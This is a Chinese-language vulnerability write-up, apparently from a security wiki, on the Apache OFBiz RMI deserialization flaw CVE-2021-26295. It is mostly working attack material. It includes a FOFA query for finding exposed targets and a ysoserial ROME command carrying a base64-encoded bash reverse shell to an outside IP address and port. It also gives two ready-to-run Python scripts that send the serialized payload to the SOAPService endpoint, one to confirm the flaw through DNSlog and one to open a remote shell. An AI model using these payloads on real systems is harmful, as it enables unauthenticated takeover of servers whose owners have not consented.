menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right Apache OFBiz chevron_right Apache OFBiz RMI反序列化漏洞 CVE-2021-26295.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Apache OFBiz RMI反序列化漏洞 CVE-2021-26295.md
    6.33 KB / 2021-04-15 12:15:18
        # Apache OFBiz rmi反序列化漏洞 CVE-2021-26295
    
    ## 漏洞描述
    
    OFBiz是基于Java的Web框架,包括实体引擎,服务引擎和基于小部件的UI。
    
    近日,Apache OFBiz官方发布安全更新。Apache OFBiz 存在RMI反序列化前台命令执行,未经身份验证的攻击者可以使用此漏洞来成功接管Apache OFBiz,建议相关用户尽快测试漏洞修复的版本并及时升级。
    
    ## 漏洞影响
    
    > [!NOTE]
    >
    > Apache OFBiz < 17.12.06
    
    ## FOFA
    
    > [!NOTE]
    >
    > app="Apache_OFBiz"
    
    ## 环境搭建
    
    ```
    docker run -d -p 8000:8080 -p 8443:8443  opensourceknight/ofbiz
    ```
    
    ## 漏洞复现
    
    使用文章目录中的POC脚本 验证 Dnslog
    
    ![](image/of-1.png)
    
    反弹shell使用 ROME反序列化链就行了
    
    ```
    java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME  "bash -c {echo,YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvLyA8JjEn}|{base64,-d}|{bash,-i}" | xxd|cut -f 2,3,4,5,6,7,8,9 -d " "|tr -d ' '|tr -d '\n'
    
    bash -c 'exec bash -i &>/dev/tcp/81.68.139.186/9999 <&1'   base64加密写入然后执行命令
    ```
    
    ![](image/of-2.png)
    
    然后把数据填入下面的 反弹shell脚本中的Hex_data参数中运行脚本即可反弹shell
    
    ![](image/of-3.png)
    
    
    
    
    
    ## 漏洞利用POC
    
    > [!NOTE]
    >
    > 需要将POC放在与  ysoserial.jar 同一目录 一个为 dnslog检测,另一个为反弹shell
    
    ```python
    import requests
    import sys
    import sys
    import subprocess
    import binascii
    from requests.packages.urllib3.exceptions import InsecureRequestWarning
    
    def title():
        print('+------------------------------------------')
        print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
        print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')
        print('+  \033[34m公众号  : PeiQi文库                                                   \033[0m')
        print('+  \033[34mVersion: Apache OFBiz                                            \033[0m')
        print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')
        print('+  \033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \033[0m')
        print('+  \033[36mDnslog      >>> http://xxx.xxx.xxx.xxx                             \033[0m')
        print('+------------------------------------------')
    
    def trans(s):
        return "%s" % ''.join('%.2x' % x for x in s)
    
    def POC_1(target_url, Dnslog):
        popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', "URLDNS", Dnslog], stdout=subprocess.PIPE)
        data = popen.stdout.read()
        hex_data = trans(data)
        headers = {
            'Content-Type': 'text/xml'
        }
        post_data = '''<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><peiqi:clearAllEntityCaches xmlns:peiqi="http://ofbiz.apache.org/service/"><peiqi:cus-obj>%s</peiqi:cus-obj></peiqi:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>''' % hex_data
        vuln_url = target_url + "/webtools/control/SOAPService"
        try:
            requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
            response = requests.post(url=vuln_url, data=post_data, headers=headers, verify=False, timeout=5)
            print("\033[36m[o] 正在请求 {}/webtools/control/SOAPService..... \033[0m".format(target_url))
            if response.status_code == 200:
                print("\033[36m[o] 请检查 Dnslog 响应\n \033[0m")
            else:
                print("\033[31m[x] 请求失败 \033[0m")
                sys.exit(0)
    
        except Exception as e:
            print("\033[31m[x] 请求失败 \033[0m")
    
    
    if __name__ == '__main__':
        title()
        target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
        Dnslog = str(input("\033[35mDnslog >>> \033[0m"))
        POC_1(target_url, Dnslog)
        
    ```
    
    > [!NOTE]
    >
    > 反弹shell脚本
    
    ```python
    import requests
    import sys
    import sys
    import subprocess
    import binascii
    from requests.packages.urllib3.exceptions import InsecureRequestWarning
    
    def title():
        print('+------------------------------------------')
        print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
        print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')
        print('+  \033[34m公众号  : PeiQi文库                                                   \033[0m')
        print('+  \033[34mVersion: Apache OFBiz                                            \033[0m')
        print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')
        print('+  \033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \033[0m')
        print('+  \033[36mHex_data    >>> 在文件中修改                                      \033[0m')
        print('+------------------------------------------')
    
    def POC_1(target_url, Dnslog):
        # java -jar ysoserial.jar ROME  "bash -c {echo,YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvLyA8JjEn}|{base64,-d}|{bash,-i}" | xxd|cut -f 2,3,4,5,6,7,8,9 -d " "|tr -d ' '|tr -d '\n'
        hex_data = "aced0xxxxxxxxxxxxxxxxxxxxxx678"
        headers = {
            'Content-Type': 'text/xml'
        }
        post_data = '''<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><peiqi:clearAllEntityCaches xmlns:peiqi="http://ofbiz.apache.org/service/"><peiqi:cus-obj>%s</peiqi:cus-obj></peiqi:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>''' % hex_data
        vuln_url = target_url + "/webtools/control/SOAPService"
        try:
            requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
            response = requests.post(url=vuln_url, data=post_data, headers=headers, verify=False, timeout=5)
            print("\033[36m[o] 正在请求 {}/webtools/control/SOAPService..... \033[0m".format(target_url))
            if response.status_code == 200:
                print("\033[36m[o] 请检查 监听地址 响应\n \033[0m")
            else:
                print("\033[31m[x] 请求失败 \033[0m")
                sys.exit(0)
    
        except Exception as e:
            print("\033[31m[x] 请求失败 \033[0m")
    
    
    if __name__ == '__main__':
        title()
        target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
        POC_1(target_url, Dnslog)
    ```
    
    
    
    links
    file_download